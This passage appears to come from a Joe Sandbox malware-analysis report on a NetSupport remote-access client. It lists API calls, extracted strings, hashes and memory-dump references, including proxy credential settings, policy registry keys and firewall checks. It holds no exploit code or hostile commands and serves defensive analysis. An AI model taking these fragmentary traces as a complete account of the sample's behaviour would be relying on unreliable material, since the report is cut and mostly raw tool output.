                                                                                        • API ID: wsprintf
                                                                                        • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                        • API String ID: 2111968516-2157635994
                                                                                        • Opcode ID: 6e0c617efeb359e25ef0cb76f7b60eecaad24fb5592b7e70307000e3a7055816
                                                                                        • Instruction ID: 09586cd0833cb75d8015f287e26d2e154fd7e1c19906b0d52c2a07e111dfcdee
                                                                                        • Opcode Fuzzy Hash: 6e0c617efeb359e25ef0cb76f7b60eecaad24fb5592b7e70307000e3a7055816
                                                                                        • Instruction Fuzzy Hash: 6222D1B2A04319ABDB21CF64CC80EFAB3B9AB5A304F0485D9E509A7144DBB55F85CF52
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,461C6054,03347250,03347240,?,00000000,1118276C,000000FF,?,11031942,03347250,00000000,?,?,?), ref: 11085E45
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                        • wsprintfA.USER32 ref: 11085F1B
                                                                                        • wsprintfA.USER32 ref: 11085F32
                                                                                        • wsprintfA.USER32 ref: 11085F49
                                                                                        • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085A98
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085AAB
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085ABE
                                                                                          • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085AD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                        • API String ID: 4263811268-2492245516
                                                                                        • Opcode ID: 580252df84bdcdc6499ed92e61105ed699e301d3311ed66a4cfed3cd2d14b9cd
                                                                                        • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                        • Opcode Fuzzy Hash: 580252df84bdcdc6499ed92e61105ed699e301d3311ed66a4cfed3cd2d14b9cd
                                                                                        • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                        APIs
                                                                                        • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                        • API String ID: 2061479752-1320826866
                                                                                        • Opcode ID: 0d39df59e163ec42972c05366f6982142c4fbac670ea150c644f180f6e7f1396
                                                                                        • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                        • Opcode Fuzzy Hash: 0d39df59e163ec42972c05366f6982142c4fbac670ea150c644f180f6e7f1396
                                                                                        • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 1110612E
                                                                                        • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                        • GetTickCount.KERNEL32 ref: 1110613D
                                                                                        • GetTickCount.KERNEL32 ref: 11106190
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                        • GetTickCount.KERNEL32 ref: 111061CA
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                        • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                        • API String ID: 1574099134-3013461081
                                                                                        • Opcode ID: b2b9c5ce670e3531f147c496016740e2bd358faf722e9ad6eefb1db8a03b9692
                                                                                        • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                        • Opcode Fuzzy Hash: b2b9c5ce670e3531f147c496016740e2bd358faf722e9ad6eefb1db8a03b9692
                                                                                        • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                        APIs
                                                                                          • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                          • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                          • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                          • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                          • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                          • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                        • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                        • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                        • GetDC.USER32(00000000), ref: 11133F03
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                        • CreateWindowExA.USER32(00000001,NSMWClass,0316DF08,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                        • String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                        • API String ID: 1594747848-4184434473
                                                                                        • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                        • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                        • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                        • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                        APIs
                                                                                          • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                        • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                          • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                        • GetTickCount.KERNEL32 ref: 1102C574
                                                                                          • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                          • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                        • API String ID: 596640303-1725438197
                                                                                        • Opcode ID: a4075b00ae435e862434feb92886abc03d766228ad5fce73a1a3aa23dd3da47f
                                                                                        • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                        • Opcode Fuzzy Hash: a4075b00ae435e862434feb92886abc03d766228ad5fce73a1a3aa23dd3da47f
                                                                                        • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                          • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                          • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Enum$Open$CloseValue
                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                        • API String ID: 2823542970-1528906934
                                                                                        • Opcode ID: 7cc112680d9f38dceee3fd69fc05097985d25d4106bb02746db8af0d702e47c0
                                                                                        • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                        • Opcode Fuzzy Hash: 7cc112680d9f38dceee3fd69fc05097985d25d4106bb02746db8af0d702e47c0
                                                                                        • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • GetTickCount.KERNEL32 ref: 11137692
                                                                                          • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                          • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                          • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                          • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                        • GetTickCount.KERNEL32 ref: 111376A1
                                                                                        • _memset.LIBCMT ref: 111376E3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                        • _strrchr.LIBCMT ref: 11137708
                                                                                        • _free.LIBCMT ref: 1113775A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                        • API String ID: 711243594-1270230032
                                                                                        • Opcode ID: 75583d28352384e2cf53e3dfb4376cfa8c34b520fed90423550415c6e03e8050
                                                                                        • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                        • Opcode Fuzzy Hash: 75583d28352384e2cf53e3dfb4376cfa8c34b520fed90423550415c6e03e8050
                                                                                        • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                        APIs
                                                                                        • ioctlsocket.WSOCK32 ref: 6D1C7642
                                                                                        • connect.WSOCK32(00000000,?,?), ref: 6D1C7659
                                                                                        • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6D1C7660
                                                                                        • _memmove.LIBCMT ref: 6D1C76D3
                                                                                        • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6D1C76F3
                                                                                        • GetTickCount.KERNEL32 ref: 6D1C7717
                                                                                        • ioctlsocket.WSOCK32 ref: 6D1C775C
                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1C7762
                                                                                        • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6D1C777A
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6D1C778B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                        • String ID: *BlockingIO$ConnectTimeout$General
                                                                                        • API String ID: 4218156244-2969206566
                                                                                        • Opcode ID: f793bb46f19506cf851d4bc2c536d44d5ef7856f8b12f4d7d8a2886d7ed1810f
                                                                                        • Instruction ID: f9b40d93435d0a91459684ecbf79973e47697322a1a4670aaa7ff85db846257b
                                                                                        • Opcode Fuzzy Hash: f793bb46f19506cf851d4bc2c536d44d5ef7856f8b12f4d7d8a2886d7ed1810f
                                                                                        • Instruction Fuzzy Hash: 4D41EB71E043189BE720DB64CC4CBFEB3BAAF55308F01419AE60D97145EBF45A84DBA2
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(111F0EF0,76938400), ref: 111450D0
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76938400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                        • _strncpy.LIBCMT ref: 111451FA
                                                                                          • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                        Strings
                                                                                        Memory Dump Source
